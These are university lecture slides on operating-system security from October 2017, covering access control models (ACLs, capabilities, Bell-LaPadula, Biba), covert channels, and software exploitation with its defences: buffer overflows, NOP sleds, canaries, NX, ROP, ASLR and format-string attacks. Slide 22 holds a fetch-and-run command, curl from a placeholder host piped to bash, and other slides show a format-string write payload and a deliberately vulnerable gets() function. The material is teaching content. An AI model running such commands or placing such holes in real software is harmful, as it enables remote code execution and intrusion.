Realtime- (and) Operating-Systems

08:15-10:00 Thursday October 12th, 2017

Security Part I


Table of Contents
Access MatricesExploitation by Primitives
Security Models

1. Introduction

  • We look at the security aspects of operating systems over 1.5 lectures.
  • Starting with a high-level view:
    • Desirable properties / goals.
    • Security models.
    • Protection Mechanisms.
  • To understand how to secure a system, we must look at how to attack it.
    • Common exploit techniques for software.
    • Defences against them.

2. Goals and Threats

Secret information: not allowing exposure (leaking).
No unauthorised changes to data, allows/requires trust.
Keeping the system operational, and available for access.
  • First three properties are the classic InfoSec definition.
  • Maintaining these properties normally relies on a fourth property.
Knowing which user initiated an action.
  • Knowing who to blame is often critical.
  • Ruling out impersonation is a basic defence against many attacks.

3. The Other Team

  • One upon a time the world was an open and trusting place.
    • Passwords were largely optional. guest accounts!
    • It was assumed that other people would be responsible.
  • Then the rest of the world was connected.
    • Now the basic assumption is the internet is the "wild west".
    • Data point: in 2008 the average time to own XP box = 4 minutes.
  • The general trend is more organised and sophisticated attackers.
    • Pwning machines has become big "business".
    • Many non-so-legal ways to turn other people's computers into money:
      • Industrial espionage, spam, money laundering, ransom demands...
  • We have to assume the other team is well-funded, highly-trained and informed.

4. Howto build secure systems

  • Get rid of the users.
    • They choose stupid passwords and click on bad links.
  • Get rid of network access.
    • There are always bugs in code, avoid remote execution vulnerabilities.
  • Get rid of physical access.
    • Cannot secure against a local attacker.
  • Get rid of privileged servers.
    • If they are exploited the system is wide open.
  • It is much simpler to just turn the system off.
    • Anything useful it can do is an entry vector.
    • Example: putting useful functions into standard libraries (printf).

5. Protection

  • Object: any resource in the computer that has restricted access.
    • e.g. files, memory pages, processes, hardware devices etc.
    • Fixed set of operations (API).
    • Unique naming scheme (need to identify each object).
  • Domains model a group of users with the same level of privilege.
    • e.g. workers, CEOs, secretaries (in increasing order).
    • UNIX: users (UIDs) in groups (GIDs): slightly finer grain.
    • A list of allowed operations for each object.

6. Domains and Objects

  • Easy to express as a matrix: objects vs domains.
  • Each cell shows access rights for domain on object.
  • Can also include domains with matrix: models change of domain.
    • e.g. UNIX gives sudo rights to users in the wheel group.
Principle of Least Authority
Do not grant more access rights than are required.
  • The most secure system is a minimum solution.
  • If people have rights they do not need then the attack surface for the system is larger.

7. Access Control Lists

  • Protection matrix is very large, and mostly empty (sparse).
  • Options: list of list, either row-wise (by domain) or column-wise (by object).
  • Column-wise approach: Access Control List - each object contains a specific list of domains (e.g. users) and allowed actions.
    • In the example: each process is owned by a user, each entry in the ACL is an allowed user/action pair.
    • This is a whitelisting approach - anything not listed is not allowed.
  • In systems that put users in groups there are several different options...

8. Access Control Lists: groups

Treat membership of a group as a mutually exclusive choice.
  • So when user X is in groups A and B, choose role (X,A) or (X,B).
    • Stronger protection model, finer grained model of access.
    • Switching roles is explicit (e.g. logout/login): more work for the user.
  • Wildcards: all users in a group *,adm, all groups a user has bob,* or everyone *,*.
Always in all groups
Approach in UNIX. User has all access rights of all their groups.
  • Coarser-grain security model: c.f. Principle of Least Authority.
  • Using an ordered list for ACL allows expression of exclusions.
    • e.g. virgil,*: none; *,*: RW sucks to be virgil.

9. Capabilities

  • We may also store the sparse protection matrix by rows, rather than columns: a list per process.
  • Each item in the list is a file and access right.
  • Although capabilities are associated with processes - the process must not be allowed to modify its own capabilities (privilege escalation).
  • Three approaches have been explored:
Hardware support
Add a tag to every word - indicates non-modifiable data, can propagate through operations.

10. Capabilities

C-list managed by kernel
Add a list of capabilities to the privileged Process Control Block
  • Straight-forward approach - only requires software.
  • Only works locally, cannot be used if the process is on a remote machine.
Cryptographic protection
Add a secret value to the inode, use a secure hash to guard the capability.
  • Use a one-way function (hash) on the capability and secret.
    • Similar approach to using a MAC.
  • Can give the untrusted data (access rights) to an untrusted process.
  • Cannot be altered without:
    • Knowing the secret (kept on the server).
    • Breaking the hash.

11. Bell-LaPadula

  • Security model for modelling the flow of sensitive information.
  • Security levels are global in the system, e.g. Unclassified, Confidential, Secret, Top-Secret.
  • Higher numbered levels have access to more confidential information.
  • Basic idea: write upwards, read downwards.
  • Prevents leaking of information to users without clearance.
  • Implementation: store security level for each UID, given to login process and inherited by each spawned process in the tree.
  • Hook open() call based on security level of user and file.

12. Biba

  • Bell-LaPadula models secrecy, not integrity.
    • Typical corporate organisation operates the other way around.
    • Levels indicate authority, not access to secret information.
Biba Model
Level k can only read levels \(\geq k\) and write levels \(\leq k\).
  • Exactly opposite to the Bell-LaPadula model.
    • Choose either secrecy or integrity - they are mutually exclusive.
    • Intuitively: to trust validity we need to know the source and vica versa.

13. Covert Channels

  • A covert channel allows one process to pass infromation to another.
    • Without using OS provided communication channels.
    • Subverts the system security model: breaks integrity/secrecy.
  • Example shows three processes on a shared system.
    • Assume some security model, e.g. Bell-LaPadula: server handles confidential information on behalf of client, should not leak it.
    • Security model does not allow it to connect to anyone else.
    • Is it possible to guarantee the model is accurate?

14. Covert Channels

  • Communication is shared understanding of a pattern.
    • When a program executes there is a lot of observable behaviour.
    • side effects: cache state, I/O load, memory contention, CPU utiliztion, resource locking, steganography...
    • Collaborator process can observe one of these, information can be transmitted.
    • If the channel is lossy - use an error correcting code.
    • Very difficult to detect or prevent: lots of examples.

Break (15mins)


15. Exploiting Software

  • "You can be sure of succeeding in your attacks if you only attack places which are undefended. You can ensure the safety of your defense if you only hold positions that cannot be attacked." - Sun Tsu
  • The OS is more than the kernel: large collection of complex programs.
  • Depending on their function, some of these are required to run as root.
  • Attacking the security of a system means find a way around the security measures built into the kernel.
  • Privilege Escalation: using an exploit against a program running as a privileged user.
    • The idea is to trick the privileged code into performing the attacker's purpose.
  • As specific techniques are discovered, defences are designed, attackers then look for new holes.
    • This creates an arms race between the two sides.

16. Buffer Overflows

  • Much code is written in C / C++.
  • Very low-level languages: no abstraction of memory or hardware provided calling procedure.
  • Arrays are simply pointers - no length information.
  • No bounds checking: writing to an index outside of the array corrupts memory.
  • No semantic difference to the second version, but programmers "expect" arrays to work differently.
  • In both cases gets() receives a raw pointer, and starts filling memory with input...
void getMessage() { char buffer[128]; printf("Enter Message:\n"); gets(buffer); writeLog(buf); }
void getMessage() { char *buffer = malloc(128); printf("Enter Message:\n"); gets(buffer); writeLog(buf); }

17. Buffer Overflows

  • a) shows the stack before getMessage() [called A in the text].
  • b) shows the creation of getMessage stack frame.
    • &buf[128] == &return address
  • c) shows the entry of more than 128 bytes by the user.
  • When the getMessage procedure exits, the program will return to an address of the attacker's choice.

18. Buffer Overflows

  • So what is a useful return address?
  • If we run the program in a debugger we can see where the stack ends up when getMessage() is called.
  • If get the program to repeat the same series of steps during another execution: the stack pointer will be the same.
  • So we can work out the address of the buffer we are filling...
  • If we input a sequence of bytes with code, and overwrite the return address we can execute the code.
  • If we can't replicate the call sequence exactly: NOP sled....

19. Heap spraying

  • NOP: no operation, a "dummy" instruction.
  • A sequence of NOP instructions does nothing.
  • But it only takes a single byte.
  • So jumping to any address in the NOP sled will cause control to pass (eventually) to the first instruction following the sled.
  • An attacker does not need to know the exact address of the target buffer - they can estimate and padd out their data with a NOP sled.
  • Not limited to the stack - can overflow heap buffers.
  • The heap structure and layout is much less predicatable than the stack.
  • Heap spraying: write NOP-sled/shellcode as often as possible.

20. Stack Canaries

  • Assume that we ship a product with many buffer overflows.
  • It is a lot of work to find them and fix them all.
  • Perhaps we can be a little lazy?
  • Canaries: little yellow birds that die quickly.
  • Pick a random number each execution.
  • On a function call write it to the stack below the return address.
  • Check the value on return, if it has changed then abort the program.
  • Buffer overflows run upwards through memory.
  • To get to the return address the attack must overwrite the location below.

21. NX Protection

  • Allowing the program to write to a piece of memory and execute it is dangerous.
  • It is also exceptionally useful for code generation: JIT compilers, meta-programming, autotuning, self-modifying code...
  • But bad programmers are the reason we can't have nice things.
  • Avoid allowing RWX access to memory pages.
  • Choose either readable code, or writable data.
    • W^X (Write XOR Execute).
  • Now shellcode written to the stack/heap cannot be executed.
  • So after seeing a piece of the arms race, have the defenders won?

22. Code Reuse Attacks

  • If we can't inject new code, can we abuse code already in the program?
  • bash -c "$(curl http://badpla.ce/shellode.sh)"
  • Standard C library includes system().
    • This executes a command from inside a program.
    • So if we can pass the above string to system(): game over.
    • system() code is linked into programs that don't use it...
  • Basic idea: overwrite the return address and args for system() call. Use the ret as a call.

23. Return-oriented programming

  • So if we fake a call mechanism on the stack, and use it by a ret...
    • The procedure that we call will eventually return...
    • If we write another fake call sequence we can play again.
  • Return Oriented Programming: build arbitrary sequences of functionality from code in the target program.
  • To do this we just need to search for fragments that we need, followed by return instructions.
  • NX was not a strong enough defence...

24. ASLR

  • ROP relies on knowing target addresses.
  • These must be exact - code cannot be changes so NOP sleds are impossible.
  • If the attacker doesn't know the address of code they cannot use ROP.
  • Address Space Layout Randomisation put the code at a different address on each execution.
  • Problem: code uses relative addressing - we must keep the offsets between (order of) procedures the same.
  • Find one address and it can be used to work out the rest.
  • Can't recompile the program on each execution - too expensive.
  • Can put the stack and heap at a random point in the address space.

25. Format String Attacks

  • Programmers forget that the first argument to printf is not a string.
    • It is a format string that controls how to interpret the other arguments on the stack.
  • printf("Hello world\n);" should really be:
  • printf("%s", "Hello world\n")
  • But nobody bothers with the extra detail...
  • When the string to be printed is entered by an attacker:
    • The difference becomes important: printf(input) is dangerous.
    • What happens if the string entered contained %s?
  • But it gets worse...
    • Weird archaic format strings that people forget are buried in libc.
    • %n write the current position into memory!
    • It almost seems to have been designed to be exploited...

26. Exploitation Mindset (an aside)

  • At first glance it may not seem obvious there is a security hole in unsanitized format strings.
The basic mindset for exploiting software
Can I build a read primitive? write primitive? execute?
  • The system will attempt to avoid exposing these to an attacker.
  • Often it will mean repurposing code meant to do something else.
  • The attacker views the code in the system in a strange way:
    • Not a collection of instructions that was designed to do something.
    • But a collection of instructions that does do something.
  • Seeing how things are vs seeing how things should be.
  • Finding the gap between these two views allows exploitation.
  • System designers must also see the world in this way: close the gaps.

27. Format String Attacks

  • Now we look closely at the format string specifiers.
    • %n write a number defined by the fmt-string into a location stored on the stack.
    • %08x consume 32-bits from the stack.
  • So by combining these both together we walk up the stack, and then write into a memory location.
    • %08x %08x %08x %n moves SP up 12 bytes and uses next 4-bytes as a pointer.
  • How can we choose the memory location?
    • The fmt-string itself is in a caller's frame.
    • Can also embed the address in the input.

28. A short interlude

  • Not so much of a summary as a brief interlude.
  • We will pick up here with more discussion of attack and defence in the context of software exploitation in the next lecture.